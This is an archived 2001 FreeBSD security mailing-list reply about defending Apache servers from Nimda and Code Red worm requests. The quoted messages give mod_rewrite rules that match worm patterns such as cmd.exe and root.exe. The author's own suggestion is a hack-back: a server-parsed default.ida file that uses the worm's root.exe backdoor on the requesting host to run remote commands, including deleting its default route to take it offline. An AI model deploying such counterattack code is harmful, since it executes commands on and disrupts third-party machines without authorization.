Date: Mon, 24 Sep 2001 07:50:17 -0400 From: Paul Chvostek <paul@it.ca> To: Matthew Seaman <matthew.seaman@tornadogroup.com> Cc: reladanderse@cs.utah.edu, smithi@nimnet.asn.au, chris@JEAH.net, security@FreeBSD.ORG Subject: Re: New worm protection Message-ID: <20010924075017.A7668@gahch.it.ca> In-Reply-To: <3BAF14F4.E9912F0F@tornadogroup.com>; from matthew.seaman@tornadogroup.com on Mon, Sep 24, 2001 at 12:11:48PM %2B0100 References: <Pine.BSF.3.96.1010924022816.9322B-100000@gaia.nimnet.asn.au> <200109231703.f8NH3NK24837@faith.cs.utah.edu> <20010923135143.A546@shall.anarcat.dyndns.org> <3BAF14F4.E9912F0F@tornadogroup.com>
next in thread | previous in thread | raw e-mail | index | archive | help
Hiya. On Mon, Sep 24, 2001 at 12:11:48PM +0100, Matthew Seaman wrote: > > The Anarcat wrote: > > > > On Sun, 23 Sep 2001, David G Andersen wrote: > > > > > Lo and behold, Ian Smith once said: > > > > > > > > Cute. Will play. However there are other directories too; dumping > > > > ANY request containing cmd.exe or root.exe would do it best here. > > > > > > Use mod_rewrite to redirect all accesses to that script. > > > > > > RewriteEngine on > > > RewriteRule .*/cmd.exe.* /scripts/nph-foo.cgi > > > > > > (I haven't tested this syntax. Test it first. :) > > > > Nice idea! Here's what I did: > > > > RewriteEngine on > > RewriteRule .*/cmd.exe.* /nimda.txt > > RewriteRule .*/root.exe.* /nimda.txt > > RewriteRule .*/default.ida.* /codered.txt > > RewriteRule .*/Admin.dll.* /codered.txt > > RewriteRule .*\\Admin.dll.* /codered.txt > > > > nimda.txt and codered.txt are simply empty files. This reduces the > > bandwitdh used by the attack and removes the entries in error.log. > > As has been mentionned elsewhere in this thread, this will cause your server > to issue a 302 re-direct. Which is probably not the effect intended. > However, there's no reason to redirect back to your own server. Those of you > feeling particularly evil may want to consider something along the lines of: > > RewriteEngine on > RewriteRule ^/(.*/cmd.exe.*)$ http://%{REMOTE_ADDR}/$1 > > which is about the closest you can come to "Up yours!" in httpd.conf speak... This would be all very nice if we could be sure that Nimda was properly HTTP compliant and respected 302 redirects, but I strongly suspect that such accurate protocol support was not one of the authors' requirements. Legality notwithstanding, my vote would be for something like this: In httpd.conf: AddType text/html .ida AddHandler server-parsed .ida And in your ServerRoot, a file called default.ida containing: <p>Here's a nickel. Buy yourself a <i>real</i> operating system.</p> <!--#exec cmd="/usr/local/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.+BTW,+your+default+root+has+been+removed.%22 >/dev/null 2>/dev/null" --> <!--#exec cmd="/usr/local/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0 >/dev/null 2>/dev/null" --> Thereby putting a message on the console and taking the machine off the Internet in a "friendly" way. -- Paul Chvostek <paul@it.ca> Operations / Development / Abuse / Whatever vox: +1 416 598-0000 IT Canada http://www.it.ca/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010924075017.A7668>